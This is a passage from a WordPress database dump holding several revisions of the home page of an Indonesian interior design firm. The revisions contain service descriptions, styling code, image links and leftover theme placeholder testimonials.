kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:58:47','2023-09-22 09:58:47','',22,'https://bauhaus.futuremediatrix.com/?p=4914',0,'revision','',0),(4915,3,'2023-09-22 09:58:47','2023-09-22 09:58:47','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:58:47','2023-09-22 09:58:47','',22,'https://bauhaus.futuremediatrix.com/?p=4915',0,'revision','',0),(4916,3,'2023-09-22 09:58:47','2023-09-22 09:58:47','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								